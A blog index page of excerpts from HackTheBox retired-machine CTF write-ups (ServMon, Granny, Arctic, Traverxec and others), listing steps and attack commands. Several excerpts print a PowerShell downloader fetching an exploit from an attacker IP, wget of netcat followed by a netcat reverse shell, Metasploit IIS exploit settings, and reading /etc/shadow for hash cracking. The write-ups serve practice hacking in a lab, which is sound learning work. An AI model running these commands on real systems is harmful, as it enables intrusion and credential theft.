WHATINFOTECH

CTF | HTB | Retired

Hackthebox ServMon writeup 3.4 (5)
Byadmin April 19, 2020June 20, 2020

Tweet
Share
Share
Pin
0 Shares
Basic Information Difficulty-EasyType -WindowsPoints-20Maker-dmw0ngUser Blood- sampriti:08 mins, 06 seconds. Root Blood-sampriti:34 mins, 10 seconds. Steps involved 1-Port Scanning2-Searching exploit for NVMS-10003-Directory Traversal(Using Burp just POC)4-FTP enumeration5-Extracting passwords Using Directory Traversal 6-SSH login into Nadine(user.tx)7-Revising FTP and Nmap enumerations8-Checking Service on port 84439-Local port forwarding through SSH10-Searching exploit for NSClient++11-Exploiting NSClient with CLI12-Getting Root.txt Commands involved…

Read More Hackthebox ServMon writeup 3.4 (5)
CTF

Passwords for the Active Hack the Box machines 4.4 (7)
Byadmin April 19, 2020June 6, 2020

Tweet
Share
Share
Pin
0 Shares
New methods For linux -cat /etc/shadow Example this. root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::So use the highlighted part as the password.So password = YIFGN9YscCV72BjFtx/ For Windows Use ntlm hash Example Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c::: password = 31d6cfe0d16ae931b73c59d7e0c Old methods For linux 1- cat /etc/shadow2-copy whole hash(root)root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::3-Then find it’s MD5 sum and that’s your password for writeup For windows 1-Find root hash with hashdump.exe…

Read More Passwords for the Active Hack the Box machines 4.4 (7)
CTF | HTB | Retired

Hackthebox Bank writeup 5 (1)
Byadmin April 17, 2020November 12, 2020

Tweet
Share
Share
Pin
0 Shares
Hackthebox Bank writeup

Read More Hackthebox Bank writeup 5 (1)
CTF

Hackthebox Granny writeup 0 (0)
Byadmin April 17, 2020April 17, 2020

Tweet
Share
Share
Pin
0 Shares
Commands used 1-nmap -sC -v 10.10.10.152-msfconsle3-use exploit/windows/iis/iis_webdav_scstoragepathfromurl4-set targeturi /_vti_bin5-set rhosts 10.10.14.205-set lhost your_ip6-set lport 12347-run Steps involved Steps invloved 1-Port Scanning2-Searching exploit for IIS 6.03-Exploiting IIS with metasploit Port scan Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-16 23:06 EDT NSE: Loaded 119 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 23:06 Completed NSE…

Read More Hackthebox Granny writeup 0 (0)
CTF | HTB | Retired

Hackthebox Grandpa writeup 0 (0)
Byadmin April 16, 2020November 12, 2020

Tweet
Share
Share
Pin
0 Shares
Hackthebox Grandpa writeup

Read More Hackthebox Grandpa writeup 0 (0)
CTF | HTB | Retired

Hack the box Arctic writeup 2 (1)
Byadmin April 16, 2020November 12, 2020

Tweet
Share
Share
Pin
0 Shares
Steps involved 1-Port scanning2-Exploiting ColdFusion 8 on port 85003-Cracking hash4-uploading reverse shell5-privilage escalation 6-Getting root.txt Commands Used 1-nmap -sC -sV -O -p- -v -oV 10.10.10.112-hash-identifier3-john hash –wordlist=/root/Desktop/rockyou.txt4-echo $webclient = New-Object System.Net.WebClient >>wget.ps15-echo $url = “http://10.10.14.20:8000/Chimichurri.exe” >>wget.ps16-echo $file = “exploit.exe” >>wget.ps17- echo $webclient.DownloadFile($url,$file) >>wget.ps1 8-powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 Port Scanning Nmap 7.70…

Read More Hack the box Arctic writeup 2 (1)
CTF | HTB | Retired

Hack the box Optimum writeup 0 (0)
Byadmin April 15, 2020November 12, 2020

Tweet
Share
Share
Pin
0 Shares
Brief It is a easy windows machine from hack the box.It’s easy but root part is little hard and more enumeration is required for it.But once you get it’s so easy. It has only a single port .And the walk through is around HFS exploits using metasploit.And then privilege escalation through a integer overflow. Steps…

Read More Hack the box Optimum writeup 0 (0)
CTF | HTB | Retired

Hack the box Beep writeup 0 (0)
Byadmin April 12, 2020November 12, 2020

Tweet
Share
Share
Pin
0 Shares
Hack the box Beep writeupI

Read More Hack the box Beep writeup 0 (0)
CTF | HTB | Retired

Hack the box Brainfuck writeup 4.5 (13)
Byadmin April 12, 2020November 12, 2020

Tweet
Share
Share
Pin
0 Shares
Brief It is a retired machine from hack the box. It’s a linux insane machine . Steps involved 1-Port scanning2-Enumerating SSLcertificates3-Editing our host file4-Exploiting WP Support Plus5-Getting email password6-Getting creds for secret form7-Decoding Vigenere ciphers8-Decrypting the id_rsa keyprase9-Getting user.txt10-Decrypting the root.txt11-Getting root.txt Commands involved 1-nmap -sC -sV -O -v -oV 10.10.10.172-nano /etc/hosts3-wpscan –url https://brainfuck.htb –disable-tls-checks4-searchsploit…

Read More Hack the box Brainfuck writeup 4.5 (13)
CTF | HTB | Retired

Hack the box(HTB) Traverxec write up 0 (0)
Byadmin April 11, 2020November 12, 2020

Tweet
Share
Share
Pin
0 Shares
Commands used 1-nmap -sC -sV -O -v -oA initial 10.10.10.42-python getshell.py 10.10.10.165 80 “cd / && mkdir tmp”3-python getshell.py 10.10.10.165 80 “cd /tmp && wget http://10.10.14.20:8000/nc”4-python getshell.py 10.10.10.165 80 “/tmp/nc -e /bin/bash 10.10.14.20 4444″5-cd /home/david/public_www6-base64 backup-ssh-identity-files.tgz7-base64 -d file >>new file8-/usr/share/john/ssh2john.py id_rsa9-john hash –wordlist=/root/Desktop/rockyou.txt10-ssh -i id_rsa [email protected]/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service12-!/bin/bash Steps invloved 1-Enumeration2-Exploiting nostromo 1.9.63-Getting a…

Read More Hack the box(HTB) Traverxec write up 0 (0)